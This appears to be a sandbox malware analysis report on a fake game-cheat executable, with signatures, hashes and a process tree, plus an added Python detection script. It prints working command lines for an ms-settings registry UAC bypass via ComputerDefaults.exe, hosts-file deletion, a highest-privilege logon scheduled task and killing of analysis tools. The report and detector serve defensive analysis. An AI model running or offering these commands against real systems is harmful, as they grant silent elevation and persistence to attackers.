Analysis

  • max time kernel
    150s
  • max time network
    126s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
  • submitted
    19-09-2024 05:15

General

  • Target

    ZEUS SOFTAIM!/RUN AS ADMIN/tranquil_radiance.exe

  • Size

    5.2MB

  • MD5

    5ed21aff5b09ec48e44a750e0abf4423

  • SHA1

    e83f10d045d00a18d17aeedb2b1901d223b9a00b

  • SHA256

    41e39eed1a999c27b61b2a9297ee969026fe9c5d7051c44c863a3bbafd07d4c5

  • SHA512

    418d26effcd36fb8fdb89e2a0dbe9e3f4cef52d67aa4de6cad2cf94a2f4cda0bd8fc896de81edd0e361938ee0ab899c70656d750e9d4e49aebeabc684909d646

  • SSDEEP

    98304:SuRHzIKiG/WxSFN0kqLto3Zt0z7QpU7kh2AOn6jz1PTMyCbj2:SczIKiGRD3b0z7QciZjpgy

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Executes dropped EXE 1 IoCs
  • Themida packer 24 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 7 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe
    "C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:2620
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\frAQBc8Wsa.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3792
      • C:\Users\Admin\AppData\Local\Temp\frAQBc8Wsa.exe
        "C:\Users\Admin\AppData\Local\Temp\frAQBc8Wsa.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1244
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\diorphone7189861.vbs" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:400
        • C:\Windows\SysWOW64\reg.exe
          "C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          PID:4748
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C computerdefaults.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2264
          • C:\Windows\SysWOW64\ComputerDefaults.exe
            computerdefaults.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4512
            • C:\Windows\SysWOW64\wscript.exe
              "wscript.exe" C:\Users\Admin\AppData\Local\Temp\diorphone7189861.vbs
              6⤵
              • Checks computer location settings
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2248
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3956
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C schtasks /Create /SC ONLOGON /TN BlueStacksUpdateHelper_AoKXaSik9IkJrGD008 /TR "C:\Users\Admin\AppData\Local\Microsoft\TypeScript\AoKXaSik9IkJrGD008.exe" /RL HIGHEST /IT
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2952
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /Create /SC ONLOGON /TN BlueStacksUpdateHelper_AoKXaSik9IkJrGD008 /TR "C:\Users\Admin\AppData\Local\Microsoft\TypeScript\AoKXaSik9IkJrGD008.exe" /RL HIGHEST /IT
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2220
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 2008
          4⤵
          • Program crash
          PID:5080
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1092
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3332
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe" MD5
        3⤵
        PID:444
      • C:\Windows\system32\find.exe
        find /i /v "md5"
        3⤵
        PID:4468
      • C:\Windows\system32\find.exe
        find /i /v "certutil"
        3⤵
        PID:4172
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4736
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:4536
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:592
      • C:\Windows\system32\taskkill.exe
        taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1996
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1244 -ip 1244
    1⤵
    PID:3972
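The tree above is a complete UAC-bypass and persistence sequence: the dropped frAQBc8Wsa.exe writes the ms-settings protocol handler under HKCU (pointing it at wscript.exe with the dropped VBS) and sets DelegateExecute, then launches ComputerDefaults.exe, an auto-elevating Microsoft binary that resolves that handler, so the VBS runs at high integrity without a consent prompt; the VBS deletes the hosts file, and a separate cmd.exe registers an ONLOGON task with /RL HIGHEST that points into AppData. The Python below is an added example, not part of the report or of the sample, that encodes those behaviours as command-line rules and runs them over the command lines copied from the tree. The rule names, the fodhelper.exe entry in the auto-elevate list and the benign comparison line are this example's own assumptions.

```python
"""Triage rules for the process tree above.

Added example, not part of the sandbox report. It turns the behaviours the
tree shows into command-line rules and runs them over the command lines
copied from the tree plus one constructed benign line. Rule names, the
fodhelper.exe entry and the benign line are assumptions of this example.
"""
import re
from typing import Iterable

# Auto-elevating Microsoft binaries that resolve the ms-settings protocol
# handler from HKCU. The report shows ComputerDefaults.exe; fodhelper.exe is
# added because it abuses the same handler (assumption, not report content).
AUTO_ELEVATE = ("computerdefaults.exe", "fodhelper.exe")

# Analysis tools the sample tries to kill (the three names in the report).
ANALYSIS_TOOLS = ("cheatengine", "httpdebugger", "processhacker")

MS_SETTINGS_HANDLER = r"\software\classes\ms-settings\shell\open\command"


def _has_all(cmd: str, *needles: str) -> bool:
    """Case-insensitive substring check for every needle."""
    low = cmd.lower()
    return all(n in low for n in needles)


# (rule name, tactic, matcher). Matchers are deliberately narrow so that the
# benign scheduled-task line below does not fire.
RULES = [
    ("ms_settings_handler_hijack", "Privilege Escalation: UAC bypass",
     lambda c: _has_all(c, "reg", " add ", MS_SETTINGS_HANDLER)),
    ("delegateexecute_set", "Privilege Escalation: UAC bypass",
     lambda c: _has_all(c, MS_SETTINGS_HANDLER, "/v delegateexecute")),
    ("auto_elevate_binary_launch", "Privilege Escalation: UAC bypass",
     lambda c: any(b in c.lower() for b in AUTO_ELEVATE)),
    ("logon_task_highest_from_user_path", "Persistence: Scheduled Task",
     lambda c: _has_all(c, "schtasks", "/create", "/rl highest")
     and re.search(r"\\appdata\\|\\temp\\", c, re.I) is not None),
    ("hosts_file_deletion", "Defense Evasion: Indicator Removal",
     lambda c: re.search(r"\bdel\b.*\\drivers\\etc\\hosts", c, re.I) is not None),
    ("analysis_tool_taskkill", "Defense Evasion: anti-analysis",
     lambda c: "taskkill" in c.lower() and any(t in c.lower() for t in ANALYSIS_TOOLS)),
]

UAC_CHAIN = {"ms_settings_handler_hijack", "delegateexecute_set", "auto_elevate_binary_launch"}


def classify(cmdline: str) -> list:
    """Names of every rule the command line triggers, in rule order."""
    return [name for name, _tactic, match in RULES if match(cmdline)]


def triage(cmdlines: Iterable[str]) -> dict:
    """Map each command line that triggers at least one rule to its hits."""
    result = {}
    for cmd in cmdlines:
        hits = classify(cmd)
        if hits:
            result[cmd] = hits
    return result


def uac_bypass_chain_present(cmdlines: Iterable[str]) -> bool:
    """True when the whole hijack sequence appears across the lines:
    handler written, DelegateExecute set, auto-elevating binary launched."""
    seen = {name for cmd in cmdlines for name in classify(cmd)}
    return UAC_CHAIN <= seen


# Command lines copied from the process tree in the report above.
REPORT_CMDLINES = [
    r'"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\diorphone7189861.vbs" /f',
    r'"C:\Windows\system32\reg.exe" add "HKCU\Software\Classes\ms-settings\shell\open\command" /v DelegateExecute /d "0" /f',
    r'"cmd.exe" /C computerdefaults.exe',
    r'"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts',
    r'schtasks /Create /SC ONLOGON /TN BlueStacksUpdateHelper_AoKXaSik9IkJrGD008 /TR "C:\Users\Admin\AppData\Local\Microsoft\TypeScript\AoKXaSik9IkJrGD008.exe" /RL HIGHEST /IT',
    r'taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T',
    r'certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\ZEUS SOFTAIM!\RUN AS ADMIN\tranquil_radiance.exe" MD5',
]

# Constructed benign line: an ordinary daily task without /RL HIGHEST.
BENIGN_CMDLINE = r'schtasks /Create /SC DAILY /TN Backup /TR "C:\Program Files\Backup\run.exe"'

if __name__ == "__main__":
    for cmd, hits in triage(REPORT_CMDLINES + [BENIGN_CMDLINE]).items():
        print(f"{', '.join(hits):45s} {cmd}")
    print("full UAC bypass chain:", uac_bypass_chain_present(REPORT_CMDLINES))
```

The certutil line is left unflagged on purpose: the sample hashing its own file is an integrity check, not something a generic rule should alert on, and the benign task line shows that the persistence rule keys on /RL HIGHEST plus a user-writable path rather than on schtasks alone. The three UAC-bypass rules are reported separately so the chain can be correlated across process-creation events; the registry write alone is the highest-value hit, since ComputerDefaults.exe is a legitimate binary.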

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\diorphone7189861.vbs

    Filesize

    171B

    MD5

    a34267102c21aff46aecc85598924544

    SHA1

    77268af47c6a4b9c6be7f7487b2c9b233d49d435

    SHA256

    eba7ab5c248e46dbe70470b41ebf25a378b4eff9ce632adff927ac1f95583d44

    SHA512

    5d320312b93b46c9051a20c82d6405a3f2c78b23adb3ab3e71aad854b65b500937de7ca2986cf79967386d689beecccf676d89afde8ecc5d5ad0cb4ae2bf38a3

  • C:\Users\Admin\AppData\Local\Temp\frAQBc8Wsa.exe

    Filesize

    11KB

    MD5

    599f14dd53faa32fefa3e2751aea1e1a

    SHA1

    c44aa18d9f8b150e7ae42193c1f1aefb36d91a3c

    SHA256

    d5996d0593c9fc0eac1fdc1da4be692f9ee0103b1151b43f71091679b2d6429f

    SHA512

    cf0bdc2edc089d6ba6ef4bdd694c301b40d39bb2a672524ac4695c1e86f29188965d6cd53fa6d290f90800b285353729517c4990a05340330f2f03855cdccc26

  • memory/1244-20-0x00007FFC2E430000-0x00007FFC2E625000-memory.dmp

    Filesize

    2.0MB

  • memory/1244-17-0x0000000004FB0000-0x0000000005554000-memory.dmp

    Filesize

    5.6MB

  • memory/1244-16-0x0000000004960000-0x00000000049F2000-memory.dmp

    Filesize

    584KB

  • memory/1244-15-0x00000000000D0000-0x00000000000DA000-memory.dmp

    Filesize

    40KB

  • memory/1244-14-0x00007FFC2E430000-0x00007FFC2E625000-memory.dmp

    Filesize

    2.0MB

  • memory/2620-8-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-24-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-9-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-7-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-6-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-5-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-2-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-3-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-4-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-1-0x00007FFC2E4D0000-0x00007FFC2E4D2000-memory.dmp

    Filesize

    8KB

  • memory/2620-21-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-22-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-23-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-0-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-25-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-26-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-27-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-28-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-29-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-30-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-31-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-32-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-33-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-34-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB

  • memory/2620-35-0x00007FF68F970000-0x00007FF6906CC000-memory.dmp

    Filesize

    13.4MB